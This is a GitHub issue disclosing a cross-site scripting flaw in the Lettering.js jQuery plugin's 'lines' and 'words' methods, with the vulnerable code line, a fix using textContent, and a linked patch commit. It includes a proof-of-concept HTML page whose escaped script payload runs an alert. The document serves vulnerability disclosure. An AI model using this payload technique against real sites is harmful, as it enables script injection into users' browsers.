Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security issue: XSS for methods 'lines' and 'words' #88

Open
pcworld opened this issue Apr 19, 2020 · 0 comments
Open

Security issue: XSS for methods 'lines' and 'words' #88

pcworld opened this issue Apr 19, 2020 · 0 comments
Labels
Bug

Comments

@pcworld
Copy link

pcworld commented Apr 19, 2020

The injector first extracts the DOM text representation, then inserts it into HTML:

Lettering.js/jquery.lettering.js

Line 20 in d06bb73

inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after;

Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site-scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the < in <span><</span> is parsed as text by browsers.

Solution

Create the <span> programmatically using document.createElement and set the content using textContent.

Exploit

<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme">&lt;script&gt;alert(&quot;I'm properly escaped HTML&quot;);&lt;/script&gt;</div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>

A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.
@pcworld pcworld mentioned this issue Apr 26, 2020
Open
pcworld added a commit to pcworld/Lettering.js that referenced this issue Apr 26, 2020
@pcworld
Fix XSS security vulnerability
339f4a2 
Using textContent instead of appending to HTML ensures that escaped HTML
characters stay escaped.
Fixes issue davatron5000#88
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@davatron5000 @pcworld